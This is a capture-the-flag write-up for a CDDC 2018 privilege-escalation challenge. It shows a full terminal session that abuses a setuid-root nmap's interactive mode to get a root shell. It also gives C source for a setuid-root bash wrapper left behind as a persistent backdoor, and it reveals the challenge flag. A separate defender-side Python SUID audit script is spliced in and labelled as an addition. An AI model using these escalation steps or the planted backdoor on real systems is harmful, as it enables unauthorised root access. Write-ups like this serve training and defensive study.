CDDC 2018: Blue Leader Stay On Target

Category: Kamikaze
Points: 163
Description:

  1. Inside the target 10.50.199.11, escalate your privilege level and obtain root access, i.e. become root.
  2. Access the ' /root ' directory on the target 10.50.199.11 and identify the file with permission bits set to -r-------- .
  3. Access the file, display the file's content and enter the content into the response field below.
  4. Submit the Kamikaze Challenge by clicking on the Submit button.

Write-Up

From the last part of the previous challenge, we have hero's password for 10.50.199.11. With that, we can log in to the shell:

[root@fw2018 ~]# ssh hero@10.50.199.11
hero@10.50.199.11's password: 
Welcome to Ubuntu 14.04.5 LTS (GNU/Linux 4.4.0-111-generic x86_64)

 * Documentation:  https://help.ubuntu.com/

  System information as of Fri Jun  1 15:42:49 UTC 2018

  System load:  0.08              Processes:           82
  Usage of /:   23.1% of 9.81GB   Users logged in:     0
  Memory usage: 6%                IP address for eth0: 10.50.199.11
  Swap usage:   0%

  Graph this data and manage this system at:
    https://landscape.canonical.com/

  Get cloud support with Ubuntu Advantage Cloud Guest:
    http://www.ubuntu.com/business/services/cloud

17 packages can be updated.
15 updates are security updates.

Your Hardware Enablement Stack (HWE) is supported until April 2019.

Last login: Fri Jun  1 15:42:49 2018 from 10.50.199.2
hero@cddc-t041-ot-svr1:~$

Given that we are supposed to attempt privilege escalation, let's try the simplest approach first: find all SUID-root files. Lo and behold, nmap is among them. Earlier versions of nmap had an --interactive mode that can spawn a shell, which makes a setuid-root nmap a big security loophole!

hero@cddc-t041-ot-svr1:~$ find / -executable -user root -perm -4000 2>/dev/null
/usr/local/bin/nmap
/usr/bin/traceroute6.iputils
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/mtr
/usr/bin/passwd
/usr/bin/pkexec
/usr/bin/sudo
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/bin/ping
/bin/mount
/bin/fusermount
/bin/umount
/bin/su
/bin/ping6
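As an added defender-side check (not part of the original write-up), the following Python audits a find listing like the one above against a constructed baseline of expected SUID-root binaries, and separately flags setuid-root files in an ls -la listing, which is how a planted helper in a home directory shows up. The baseline set, the shell-capable name set and the sample lines are assumptions constructed for this example.

```python
"""Added audit helper (not from the write-up): compares `find / -perm -4000`
output with an expected baseline and flags setuid-root entries in `ls -la`."""
import re
from pathlib import PurePosixPath

# Constructed baseline (assumption): SUID-root binaries a stock Ubuntu 14.04 host ships.
BASELINE = {
    "/usr/bin/gpasswd", "/usr/bin/chfn", "/usr/bin/newgrp", "/usr/bin/chsh",
    "/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/pkexec", "/usr/bin/mtr",
    "/usr/bin/traceroute6.iputils", "/usr/lib/policykit-1/polkit-agent-helper-1",
    "/usr/lib/openssh/ssh-keysign", "/usr/lib/eject/dmcrypt-get-device",
    "/bin/ping", "/bin/ping6", "/bin/mount", "/bin/umount", "/bin/fusermount", "/bin/su",
}
# Binary names known to hand out a shell when setuid-root (the page's case: nmap --interactive).
SHELL_CAPABLE = {"nmap"}

def audit_suid_list(find_output):
    """Return (not_in_baseline, shell_capable) from `find / -user root -perm -4000` output."""
    not_in_baseline, shell_capable = [], []
    for path in (l.strip() for l in find_output.splitlines() if l.strip()):
        if path not in BASELINE:
            not_in_baseline.append(path)
        if PurePosixPath(path).name in SHELL_CAPABLE:
            shell_capable.append(path)
    return not_in_baseline, shell_capable

# ls -la fields: mode links owner group size month day time name
LS_RE = re.compile(r"^([-a-zA-Z]{10})\S*\s+\d+\s+(\S+)\s+\S+\s+\S+\s+\S+\s+\d+\s+\S+\s+(.+)$")

def setuid_root_in_listing(ls_output):
    """Names from `ls -la` output owned by root whose owner-exec bit is 's' or 'S'."""
    hits = []
    for line in ls_output.splitlines():
        m = LS_RE.match(line)
        if m and m.group(2) == "root" and m.group(1)[3] in "sS":
            hits.append(m.group(3))
    return hits

# Constructed samples in the same shape as the write-up's terminal output.
SAMPLE_FIND = "/usr/local/bin/nmap\n/usr/bin/gpasswd\n/usr/bin/sudo\n/bin/su\n"
SAMPLE_LS = """drwxr-xr-x 3 hero hero 4.0K Jun  1 15:51 .
-rw-rw-r-- 1 hero hero  256 Jun  1 15:47 suidhelper.c
-rwsrwxr-x 1 root root 8.6K Jun  1 15:47 suidhelper
-rwxrwxr-x 1 hero hero 8.1M Jun  1 15:32 wew"""

if __name__ == "__main__":
    print(audit_suid_list(SAMPLE_FIND))       # (['/usr/local/bin/nmap'], ['/usr/local/bin/nmap'])
    print(setuid_root_in_listing(SAMPLE_LS))  # ['suidhelper']
```

On a real host, feed it `find / -executable -user root -perm -4000 2>/dev/null` and `ls -la` output captured from a known-good image, and diff the baseline over time rather than trusting a static list.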

Since nmap gives us a way to get a root shell, we first prepare a quality-of-life helper, the small SUID wrapper below:

#include <unistd.h>
#include <err.h>
#include <stdio.h>
#include <sys/types.h>

int main(void) {
    /* Once the binary is setuid-root, make uid and gid 0 permanent for the new shell. */
    if (setuid(0) || setgid(0))
        err(1, "setuid/setgid");
    fputs("we have root privs now...\n", stderr);
    /* Replace this process with a root bash; only reached if exec fails. */
    execl("/bin/bash", "bash", NULL);
    err(1, "execl");
}

Just compile it with good old gcc (gcc suidhelper.c -o suidhelper) and we can now use nmap to escalate:

hero@cddc-t041-ot-svr1:~$ nmap --interactive

Starting Nmap V. 4.11 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
nmap> whoami
Unknown command (whoami) -- press h <enter> for help
nmap> !sh
# whoami
root
# ls
suidhelper  suidhelper.c
# chmod u+s suidhelper
# ls -lah
total 8.2M
drwxr-xr-x 3 hero hero 4.0K Jun  1 15:51 .
drwxr-xr-x 6 root root 4.0K May 14 07:31 ..
-rw------- 1 hero hero 1.2K Jun  1 15:42 .bash_history
-rw-r--r-- 1 hero hero  220 Feb 13 08:06 .bash_logout
-rw-r--r-- 1 hero hero 3.6K Feb 13 08:06 .bashrc
drwx------ 2 hero hero 4.0K May 14 07:29 .cache
-rwxr-xr-x 1 hero hero  156 Jun  1 15:47 compile.sh
-rw-rw-r-- 1 hero hero 4.1K Jun  1 15:46 doubleput.c
-rw-rw-r-- 1 hero hero 2.2K Jun  1 15:46 hello.c
-rw-r--r-- 1 hero hero  675 Feb 13 08:06 .profile
-rwsrwxr-x 1 root root 8.6K Jun  1 15:47 suidhelper
-rw-rw-r-- 1 hero hero  256 Jun  1 15:47 suidhelper.c
-rw------- 1 hero hero 3.1K Jun  1 15:51 .viminfo
-rwxrwxr-x 1 hero hero 8.1M Jun  1 15:32 wew
-rw-rw-r-- 1 hero hero  19K Jun  1 15:32 wew.c
# exit
waiting to reap child: No child processes (10)
nmap> exit

Now, to win the challenge, just run our free root shell helper:

hero@cddc-t041-ot-svr1:~$ ./suidhelper 
we have root privs now...
root@cddc-t041-ot-svr1:~# cd /root
root@cddc-t041-ot-svr1:/root# ls
evidence
root@cddc-t041-ot-svr1:/root# cat evidence 
Well done ! Way to go !!

Therefore, the flag is Well done ! Way to go !!.
